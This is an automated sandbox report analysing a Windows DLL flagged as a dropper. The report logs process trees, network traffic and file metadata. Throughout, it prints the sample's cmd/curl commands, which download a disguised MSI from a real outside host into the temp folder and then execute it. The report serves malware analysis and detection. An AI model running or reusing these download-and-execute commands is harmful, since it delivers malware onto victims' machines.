Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Win64.DropperX-gen.15394.30671.exe

Overview

General Information

Sample Name:SecuriteInfo.com.Win64.DropperX-gen.15394.30671.exe (renamed file extension from exe to dll)
Analysis ID:756307
MD5:977f29431f9233f22f51b3d27e8abc28
SHA1:7999931d13db79b25e8660065fbbe5288dc04d7e
SHA256:b875add23dbf8b2942af53c0610c779c4263dacdf69186a3d4c9c09c3ebebdbe
Tags:exe
Infos:

Detection

Score:2
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Sample execution stops while process was sleeping (likely an evasion)
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • loaddll64.exe (PID: 2232 cmdline: loaddll64.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll" MD5: C676FC0263EDD17D4CE7D644B8F3FCD6)
    • conhost.exe (PID: 6000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 2868 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll",#1 MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • rundll32.exe (PID: 5104 cmdline: rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll",#1 MD5: 73C519F050C20580F8A62C849D49215A)
        • cmd.exe (PID: 2964 cmdline: cmd /C curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o %temp%\spclwow78x.msi MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 5284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • curl.exe (PID: 2772 cmdline: curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o C:\Users\user\AppData\Local\Temp\spclwow78x.msi MD5: BDEBD2FC4927DA00EEA263AF9CF8F7ED)
        • cmd.exe (PID: 1784 cmdline: cmd /C %temp%\spclwow78x.msi MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 4764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • rundll32.exe (PID: 4580 cmdline: rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll,xlAutoOpen MD5: 73C519F050C20580F8A62C849D49215A)
      • cmd.exe (PID: 3664 cmdline: cmd /C curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o %temp%\spclwow78x.msi MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 5296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • curl.exe (PID: 1308 cmdline: curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o C:\Users\user\AppData\Local\Temp\spclwow78x.msi MD5: BDEBD2FC4927DA00EEA263AF9CF8F7ED)
      • cmd.exe (PID: 4544 cmdline: cmd /C %temp%\spclwow78x.msi MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 3972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • rundll32.exe (PID: 5968 cmdline: rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll",xlAutoOpen MD5: 73C519F050C20580F8A62C849D49215A)
      • cmd.exe (PID: 5908 cmdline: cmd /C curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o %temp%\spclwow78x.msi MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 3712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • curl.exe (PID: 5260 cmdline: curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o C:\Users\user\AppData\Local\Temp\spclwow78x.msi MD5: BDEBD2FC4927DA00EEA263AF9CF8F7ED)
      • cmd.exe (PID: 5320 cmdline: cmd /C %temp%\spclwow78x.msi MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 1408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Snort rule has matched

Click to jump to signature section

Show All Signature Results

There are no malicious signatures, click here to show all signatures.

Source: SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dllStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: C:\ss2\Projects\MsiWrapper\MsiCustomActions\Release\MsiCustomActions.pdb source: spclwow78x.msi.12.dr
Source: unknownDNS traffic detected: queries for: anydesk10.hospedagemdesites.ws
Source: global trafficHTTP traffic detected: GET /UIServices.jpg HTTP/1.1Host: anydesk10.hospedagemdesites.wsUser-Agent: curl/7.55.1Accept: */*
Source: global trafficHTTP traffic detected: GET /UIServices.jpg HTTP/1.1Host: anydesk10.hospedagemdesites.wsUser-Agent: curl/7.55.1Accept: */*
Source: global trafficHTTP traffic detected: GET /UIServices.jpg HTTP/1.1Host: anydesk10.hospedagemdesites.wsUser-Agent: curl/7.55.1Accept: */*
Source: curl.exe, 00000013.00000002.314169873.0000025DD86A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://anydesk10.hospedagemdesites.ws/UIServices.jpg
Source: cmd.exe, 00000005.00000002.312230580.000002F48A740000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.312615492.0000025D5B2C0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.314800313.0000017F1AD40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://anydesk10.hospedagemdesites.ws/UIServices.jpg-o%temp%
Source: curl.exe, 0000000B.00000002.312202696.000001DCAC560000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000C.00000002.311774782.00000213305C0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000013.00000002.314169873.0000025DD86A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://anydesk10.hospedagemdesites.ws/UIServices.jpg-oC:
Source: curl.exe, 0000000C.00000003.311639977.00000213305CF000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000C.00000002.311799465.00000213305D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://anydesk10.hospedagemdesites.ws/UIServices.jpg4
Source: curl.exe, 0000000C.00000003.311639977.00000213305CF000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000C.00000002.311799465.00000213305D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://anydesk10.hospedagemdesites.ws/UIServices.jpg8
Source: C:\Windows\System32\curl.exeFile created: C:\Users\user\AppData\Local\Temp\spclwow78x.msiJump to behavior
Source: SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\loaddll64.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: classification engineClassification label: clean2.winDLL@35/4@3/1
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll,xlAutoOpen
Source: unknownProcess created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll"
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll",#1
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll,xlAutoOpen
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll",#1
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe cmd /C curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o %temp%\spclwow78x.msi
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe cmd /C curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o %temp%\spclwow78x.msi
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe cmd /C %temp%\spclwow78x.msi
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe cmd /C %temp%\spclwow78x.msi
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o C:\Users\user\AppData\Local\Temp\spclwow78x.msi
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o C:\Users\user\AppData\Local\Temp\spclwow78x.msi
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll",xlAutoOpen
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe cmd /C curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o %temp%\spclwow78x.msi
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe cmd /C %temp%\spclwow78x.msi
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o C:\Users\user\AppData\Local\Temp\spclwow78x.msi
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll",#1
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll,xlAutoOpen
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll",xlAutoOpen
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll",#1
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe cmd /C curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o %temp%\spclwow78x.msi
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe cmd /C %temp%\spclwow78x.msi
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe cmd /C curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o %temp%\spclwow78x.msi
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe cmd /C %temp%\spclwow78x.msi
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o C:\Users\user\AppData\Local\Temp\spclwow78x.msi
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o C:\Users\user\AppData\Local\Temp\spclwow78x.msi
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe cmd /C curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o %temp%\spclwow78x.msi
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe cmd /C %temp%\spclwow78x.msi
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o C:\Users\user\AppData\Local\Temp\spclwow78x.msi
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5284:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4764:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1408:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6000:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3712:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5296:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3972:120:WilError_01
Source: C:\Windows\System32\curl.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\curl.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\curl.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\curl.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\curl.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\curl.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dllStatic PE information: Image base 0x180000000 > 0x60000000
Source: SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dllStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
Source: SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\ss2\Projects\MsiWrapper\MsiCustomActions\Release\MsiCustomActions.pdb source: spclwow78x.msi.12.dr
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\loaddll64.exe TID: 2312Thread sleep time: -120000s >= -30000s
Source: curl.exe, 0000000B.00000003.312004880.000001DCAC56F000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000B.00000002.312222162.000001DCAC572000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000C.00000003.311639977.00000213305CF000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000013.00000002.314228700.0000025DD86AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\loaddll64.exeThread delayed: delay time: 120000
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll",#1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o C:\Users\user\AppData\Local\Temp\spclwow78x.msi
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o C:\Users\user\AppData\Local\Temp\spclwow78x.msi
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o C:\Users\user\AppData\Local\Temp\spclwow78x.msi
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsWindows Management InstrumentationPath Interception11
Process Injection
1
Rundll32
OS Credential Dumping1
Security Software Discovery
Remote ServicesData from Local SystemExfiltration Over Other Network Medium2
Non-Application Layer Protocol
Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts11
Virtualization/Sandbox Evasion
LSASS Memory11
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth2
Application Layer Protocol
Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)11
Process Injection
Security Account Manager11
System Information Discovery
SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
Ingress Tool Transfer
Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDS1
Remote System Discovery
Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 process2 2 Behavior Graph ID: 756307 Sample: SecuriteInfo.com.Win64.Drop... Startdate: 30/11/2022 Architecture: WINDOWS Score: 2 8 loaddll64.exe 1 2->8         started        process3 10 cmd.exe 1 8->10         started        12 rundll32.exe 8->12         started        14 rundll32.exe 8->14         started        16 conhost.exe 8->16         started        process4 18 rundll32.exe 10->18         started        20 cmd.exe 12->20         started        22 cmd.exe 12->22         started        24 cmd.exe 14->24         started        26 cmd.exe 14->26         started        process5 28 cmd.exe 1 18->28         started        30 cmd.exe 1 18->30         started        32 curl.exe 2 20->32         started        35 conhost.exe 20->35         started        37 conhost.exe 22->37         started        39 curl.exe 1 24->39         started        41 conhost.exe 24->41         started        43 conhost.exe 26->43         started        dnsIp6 45 curl.exe 1 28->45         started        48 conhost.exe 28->48         started        50 conhost.exe 30->50         started        52 anydesk10.hospedagemdesites.ws 191.252.51.12, 49699, 49700, 49701 LocawebServicosdeInternetSABR Brazil 32->52 process7 dnsIp8 54 anydesk10.hospedagemdesites.ws 45->54

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
anydesk10.hospedagemdesites.ws
191.252.51.12
truefalse
    high
    NameMaliciousAntivirus DetectionReputation
    http://anydesk10.hospedagemdesites.ws/UIServices.jpgfalse
      high
      NameSourceMaliciousAntivirus DetectionReputation
      http://anydesk10.hospedagemdesites.ws/UIServices.jpg8curl.exe, 0000000C.00000003.311639977.00000213305CF000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000C.00000002.311799465.00000213305D2000.00000004.00000020.00020000.00000000.sdmpfalse
        high
        http://anydesk10.hospedagemdesites.ws/UIServices.jpg-o%temp%cmd.exe, 00000005.00000002.312230580.000002F48A740000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.312615492.0000025D5B2C0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.314800313.0000017F1AD40000.00000004.00000020.00020000.00000000.sdmpfalse
          high
          http://anydesk10.hospedagemdesites.ws/UIServices.jpg4curl.exe, 0000000C.00000003.311639977.00000213305CF000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000C.00000002.311799465.00000213305D2000.00000004.00000020.00020000.00000000.sdmpfalse
            high
            http://anydesk10.hospedagemdesites.ws/UIServices.jpg-oC:curl.exe, 0000000B.00000002.312202696.000001DCAC560000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000C.00000002.311774782.00000213305C0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000013.00000002.314169873.0000025DD86A0000.00000004.00000020.00020000.00000000.sdmpfalse
              high
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
              IPDomainCountryFlagASNASN NameMalicious
              191.252.51.12
              anydesk10.hospedagemdesites.wsBrazil
              27715LocawebServicosdeInternetSABRfalse
              Joe Sandbox Version:36.0.0 Rainbow Opal
              Analysis ID:756307
              Start date and time:2022-11-30 00:32:06 +01:00
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 3m 21s
              Hypervisor based Inspection enabled:false
              Report type:light
              Sample file name:SecuriteInfo.com.Win64.DropperX-gen.15394.30671.exe (renamed file extension from exe to dll)
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
              Number of analysed new started processes analysed:21
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Detection:CLEAN
              Classification:clean2.winDLL@35/4@3/1
              EGA Information:Failed
              HDC Information:Failed
              HCA Information:
              • Successful, ratio: 100%
              • Number of executed functions: 0
              • Number of non-executed functions: 0
              Cookbook Comments:
              • Stop behavior analysis, all processes terminated
              • Not all processes where analyzed, report is missing behavior information
              • TCP Packets have been reduced to 100
              TimeTypeDescription
              00:33:01API Interceptor3x Sleep call for process: rundll32.exe modified
              00:33:03API Interceptor1x Sleep call for process: loaddll64.exe modified
              No context
              No context
              No context
              No context
              No context
              Process:C:\Windows\System32\curl.exe
              File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Code page: 1252, Title: Office 16 Click-to-Run Licensing Component - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com 16.0.15726.20202, Subject: Office 16 Click-to-Run Licensing Component - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com, Author: Microsoft Corporation, Keywords: Installer, Template: Intel;1033, Revision Number: {5A98002E-3B20-4BF2-9AFA-74F54CAB6E33}, Create Time/Date: Sat Jul 23 13:01:26 2022, Last Saved Time/Date: Sat Jul 23 13:01:26 2022, Number of Pages: 200, Number of Words: 12, Name of Creating Application: MSI Wrapper (10.0.51.0), Security: 2
              Category:modified
              Size (bytes):2719744
              Entropy (8bit):7.9576378357321165
              Encrypted:false
              SSDEEP:49152:TpUPWBdidvJXFzhYsAdZYH4YwKw2oHUNgir2MYgoGLcOh0YdMsyRyIQw:TpvBxZtYDWHUNgiazgowjzu1Qw
              MD5:8FF0F8F8BA57670BC5A4BB010BBD4FC3
              SHA1:2A0EECF5BD6F7B33B8EC4AAB8FE325DDE4068D13
              SHA-256:3D644640BF3F0CDB52AD3E920960BB42EB355BBBE31B98A02A6E08027EEA977C
              SHA-512:5A46401F7543B61946C6B8840D94286B488E66D057110C19CD1A52944E842E1ABEE24A79368EE0FA1E209076E7EB51491E96E8778628E75ED2D9E7333E87C0E1
              Malicious:false
              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Windows\System32\curl.exe
              File Type:ASCII text, with CR, LF line terminators
              Category:dropped
              Size (bytes):636
              Entropy (8bit):3.414381314704777
              Encrypted:false
              SSDEEP:12:Vz6ykymUexb1U9cJN4rVxPMyXx7NUANtigXDs:HkyH+bJnixPMyXxpUACgzs
              MD5:E1BD3DE85C02C458F242AE55BC4120E4
              SHA1:BB4D3096DEB407BD27D0FC7210485118D2387022
              SHA-256:9A41692153E3BF6E26AA5771264B8323F85A18E640F1501DBBC28362B9D6D5DD
              SHA-512:B8BA4F9CFDE8182D9A0F3F6E7A0CA3A59A5513191E44B358661D6F82A92B13B37F6B9176315225134F8FE3B4CEF77303167A633A8FFB213FF053615DE023B69E
              Malicious:false
              Preview: % Total % Received % Xferd Average Speed Time Time Time Current.. Dload Upload Total Spent Left Speed... 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0. 3 2656k 3 88415 0 0 88415 0 0:00:30 0:00:01 0:00:29 80818. 10 2656k 10 274k 0 0 274k 0 0:00:09 0:00:01 0:00:08 144k. 35 2656k 35 930k 0 0 310k 0 0:00:08 0:00:03 0:00:05 305k. 77 2656k 77 2050k 0 0 683k 0 0:00:03 0:00:03 --:--:-- 524k.100 2656k 100 2656k 0 0 664k 0 0:00:04 0:00:04 --:--:-- 584k..
              File type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
              Entropy (8bit):3.0307538143964656
              TrID:
              • Win64 Dynamic Link Library (generic) (102004/3) 86.43%
              • Win64 Executable (generic) (12005/4) 10.17%
              • Generic Win/DOS Executable (2004/3) 1.70%
              • DOS Executable Generic (2002/1) 1.70%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.01%
              File name:SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll
              File size:4096
              MD5:977f29431f9233f22f51b3d27e8abc28
              SHA1:7999931d13db79b25e8660065fbbe5288dc04d7e
              SHA256:b875add23dbf8b2942af53c0610c779c4263dacdf69186a3d4c9c09c3ebebdbe
              SHA512:72330def651641ae479360cab2e258fdc489486e72db1ee1047ce523b20a8e31e6aae172f1ccf3d6515e72d655ca9e35725b34ff44d07760ab707e8dea2acbda
              SSDEEP:48:aMIaP2YiSjVNII/7zlyaXt8hSx6zcJRu:NaieInFWa
              TLSH:5E81A6B3ABB122F6F27D433A506BCC74716E371861E24B5D8D58E02F1872D5E7801782
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............z...z...z.r.{...z...{...z...s...z...z...z.......z...x...z.Rich..z.........................PE..d....f.c.........." ..."...
              Icon Hash:74f0e4ecccdce0e4
              Entrypoint:0x180000000
              Entrypoint Section:
              Digitally signed:false
              Imagebase:0x180000000
              Subsystem:windows gui
              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, DLL
              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
              Time Stamp:0x638666D4 [Tue Nov 29 20:08:52 2022 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:6
